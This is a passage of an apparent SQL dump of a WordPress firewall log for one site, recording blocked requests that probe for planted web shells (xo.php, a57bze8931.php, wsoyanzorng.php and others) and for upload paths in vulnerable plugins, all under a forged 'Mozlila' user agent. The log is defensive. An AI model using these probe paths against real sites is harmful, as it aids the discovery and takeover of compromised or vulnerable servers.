User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQveG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12127,1674841749.725380,1674841749.617500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12128,1674841748.542724,1674841748.397000,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvYWJydXppLnBocDQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(12129,1674841747.271166,1674841747.122200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12130,1674841745.935973,1674841745.829300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/king.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQva2luZy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12131,1674841744.895621,1674841744.781300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/adruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12132,1674841743.706643,1674841743.598500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/adruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYWRydXppLnBocDQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(12133,1674841741.971755,1674841741.863900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/adruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2FkcnV6aS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12134,1674841740.795001,1674841740.683400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12135,1674841739.747364,1674841739.638700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12136,1674841738.589034,1674841738.474900,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12137,1674841737.357389,1674841737.251100,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/abruzi.php4','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FicnV6aS5waHA0\",\"category\":\"brute-force\",\"ssl\":1}'),(12138,1674841736.193091,1674841736.084500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-engine-module/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lbmdpbmUtbW9kdWxlL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12139,1674841735.029131,1674841734.911400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/wp_live_chat/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy93cF9saXZlX2NoYXQvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12140,1674841733.788554,1674841733.655700,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/files/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL2ZpbGVzL3hvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12141,1674841732.417150,1674841732.277300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvYWJydXppLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12142,1674841730.997721,1674841730.887800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkveG8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12143,1674841729.997825,1674841729.889200,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/files/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzL2E1N2J6ZTg5MzEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(12144,1674841728.810654,1674841728.700400,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/formcraft/file-upload/server/php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9mb3JtY3JhZnQvZmlsZS11cGxvYWQvc2VydmVyL3BocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12145,1674841727.556030,1674841727.415300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/xo.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL3hvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12146,1674841726.102904,1674841725.980500,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/apikey/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYTU3YnplODkzMS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(12147,1674841725.538324,1674841725.423800,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimizations/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9ucy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12148,1674841724.957677,1674841724.824300,'\0\0\0\0\0\0\0\0\0\0��ˇ�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/a57bze8931.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kenMtem9vbXNvdW5kcy9hNTdiemU4OTMxLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12149,1674859260.152909,1674859260.026800,'\0\0\0\0\0\0\0\0\0\0��U�bM',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12150,1674859247.048491,1674859246.918900,'\0\0\0\0\0\0\0\0\0\0��U�bM',0,403,0,0,0,'https://www.dailyjolly.co.uk/wsoyanzorng.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dzb3lhbnpvcm5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12151,1674859300.049995,1674859299.922400,'\0\0\0\0\0\0\0\0\0\0��U�bM',0,403,0,0,0,'https://www.dailyjolly.co.uk/ccx/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 